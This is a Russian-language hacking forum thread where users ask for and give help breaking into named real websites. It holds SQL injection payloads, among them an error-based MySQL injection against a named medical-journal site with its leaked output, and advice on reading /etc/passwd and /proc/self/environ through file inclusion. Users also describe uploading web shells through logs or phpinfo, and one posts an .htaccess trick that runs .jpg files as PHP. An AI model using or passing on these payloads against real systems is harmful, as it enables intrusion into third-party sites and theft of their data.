Ваши вопросы по уязвимостям.

Как узнать путь на хостинге, имея sql-inj?
Вот таблицы с данными админки нет, делаю
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt' --

пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1.txt --' at line 1

 

Одинаковый.Что значит мудаки?

 

короче просто некоторым пользователям выставили ограничение на заливку файло,там обновление.
теперь надеюсь понятно?!?!
МУДАКИ-->значит мудаки

 

Мудаки, потому, что базу засирают.
foma9999, мм, похоже на error based, но очень странная. Я не смог раскрутить. Софт тоже не взял. Спроси у Ereee.

 

http://i.imgur.com/y2VVs.png
http://i.imgur.com/ULCKV.png

Как сливать базу в таком виде?

 

так не бывает

 

http://www.globalomsk.ru/directory/user.php

Есть sql?

 

если есть права на чтение запись то прочитай файл etc/passwd

да, там в форме входа

 

да вы уже со всем обленились((((
берите toolza,sqlmap и вперёд
я думаю такие посты либо сразу delete либо выговор какой нить,модеры позаботьтесь об этом

 

Ребят, что делать если proc/self/environ пуст?
Хотя тут всё ок
proc/self/status
proc/self/cmdline (/usr/sbin/apache2-kstart)
etc/passwd

 

Fooog
Во-первых, к переменным окружения не всегда есть доступ.
Во-вторых, там не всегда есть данные, которыми можно манипулировать.
В -третьих, твои слова:

Звучат весьма, мммммм, эпично =\

 

ну так а что в таком случае делать?

 

искать логи и заливать шел через них

 

Если на сервере (именно на всем сервере на любом сайте) есть phpinfo - можно спокойно залить шелл через LFI.

 

как раскрутить через error based?
http://www.sirirajmedj.com/content.php?content_id=2554

 

Например так:
http://www.sirirajmedj.com/content.php?content_id=2554+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
Смотри исходник(внизу):

Code:

<!--SQL: SELECT c.journal_id, c.section_id, c.subject, c.address, c.abstract, c.keyword, c.keyword, c.pdf_file, c.start_page, c.end_page FROM medj_content as c WHERE c.status = 1 AND c.content_id = 2554 and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--
MySQL: Duplicate entry '[COLOR=Red]COLLATIONS[/COLOR]1' for key 1-->

 

а вот такой вопрос, залил шелл на сайт через админку, открываю его а мне пишет
500 Внутренняя ошибка сервера, я тут гдето видел что нужно залить файл htaccess а что в нём должно быть написано чтобы всё работало?

 

Code:

AddType application/x-httpd-php .jpg 
AddHandler application/x-httpd-php .jpg

 

спасибо большое, ток я не могу тебе + поставить

 

не, я та и php могу залить, мне не нужна картинка, тросто при открытии шелла пишет 500 Внутренняя ошибка сервера, может файл htaccess както помочь ето исправить?